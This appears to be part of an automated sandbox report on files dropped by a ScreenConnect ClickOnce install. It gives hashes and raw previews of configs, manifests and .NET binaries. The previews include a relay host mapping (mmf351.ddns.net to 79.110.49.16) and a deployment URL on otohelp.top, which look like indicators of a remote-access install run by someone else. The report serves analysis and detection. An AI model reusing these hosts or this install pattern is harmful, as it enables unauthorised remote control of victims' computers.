                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1970
                                                                                                                                                Entropy (8bit):4.690426481732819
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                                                                                MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                                                                                SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                                                                                SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                                                                                SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):559
                                                                                                                                                Entropy (8bit):5.042876835377422
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO0Y81v7TVv/vXbAa3xT:2dL9hK6E46YPt8JFvH
                                                                                                                                                MD5:0AFFE6B30C1B82A04C5BD28A289F8FD0
                                                                                                                                                SHA1:3C7C11FCCC3CDF868A5171D5FAB96AA54F01779E
                                                                                                                                                SHA-256:509F9909D24F034B6CD5CED0019F6E91CFA526C4FB9F0F7DE7FA708792BEBB50
                                                                                                                                                SHA-512:E253E03AEBBA34599BDF410E2939F45ADF1C066A740F60E792EB25F356F56839C6A39E89BD56242948D6CA8E546F88D29FAAAB09B1C7168712AEAD83CE8BF950
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>mmf351.ddns.net=79.110.49.16-02%2f10%2f2024%2004%3a25%3a37</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):559
                                                                                                                                                Entropy (8bit):5.042876835377422
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO0Y81v7TVv/vXbAa3xT:2dL9hK6E46YPt8JFvH
                                                                                                                                                MD5:0AFFE6B30C1B82A04C5BD28A289F8FD0
                                                                                                                                                SHA1:3C7C11FCCC3CDF868A5171D5FAB96AA54F01779E
                                                                                                                                                SHA-256:509F9909D24F034B6CD5CED0019F6E91CFA526C4FB9F0F7DE7FA708792BEBB50
                                                                                                                                                SHA-512:E253E03AEBBA34599BDF410E2939F45ADF1C066A740F60E792EB25F356F56839C6A39E89BD56242948D6CA8E546F88D29FAAAB09B1C7168712AEAD83CE8BF950
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>mmf351.ddns.net=79.110.49.16-02%2f10%2f2024%2004%3a25%3a37</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):68096
                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1373
                                                                                                                                                Entropy (8bit):5.369201792577388
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
                                                                                                                                                File Type:CSV text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):847
                                                                                                                                                Entropy (8bit):5.345615485833535
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (613), with CRLF line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):14920
                                                                                                                                                Entropy (8bit):3.806210504627678
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:t6BKOdfqHgcNfUpUBBaOy0lZadfqHgcNEhU/Fhd/ivhvE880+0kkh0xL0fdfqHgH:WqHzoUaZqHz55YqHziGLEv
                                                                                                                                                MD5:70A21C83498DB75846400D7627505B90
                                                                                                                                                SHA1:60D4D0ABC4114C3365213A7F12A514CE13DC0042
                                                                                                                                                SHA-256:F065D6EF48C9AF51B5D2A23B92B944EC2871E379ABDA7D03340AD97552D16B4E
                                                                                                                                                SHA-512:C9B86F7D8F50DD4C1EB3E4A5654CDE321CF5B40C9E0AC77365A15A99CEB7CD34A79A94E9FC24710FFFAA9839519C1E3D188935CCEDF92C58EB4E60C1D271FF34
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.o.t.o.h.e.l.p...t.o.p./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.m.m.f.3.5.1...d.d.n.s...n.e.t.&.p.=.8.0.4.1.&.s.=.b.0.4.4.e.7.2.7.-.8.6.0.9.-.4.a.6.c.-.b.8.8.5.-.9.2.d.6.2.4.9.
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):118084
                                                                                                                                                Entropy (8bit):5.584890162201507
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:0aNIcT51/FXvMVNWfCXq9ymxm2o9HuzhJOvP:0FcfiVITmt8vOvP
                                                                                                                                                MD5:9F442D8293F1917B8CD6F007F3FEEBE6
                                                                                                                                                SHA1:3065E347263BFEA93CC987DF08E9630EBCF3E870
                                                                                                                                                SHA-256:CB63564F6233140A150E013346957F108A71E8B224A82FD68B6FD6418324D438
                                                                                                                                                SHA-512:58D79221BF7771535A878B11A4454BBAA75D6EFA087B4CB0DDA486E9E58A66F89D518A104AE8249471561FAC20BEBA39A5D011F4172DCFD72BAD931A26E534F0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):197120
                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1041
                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):68096
                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1636
                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):95520
                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):548864
                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.1303806593325705
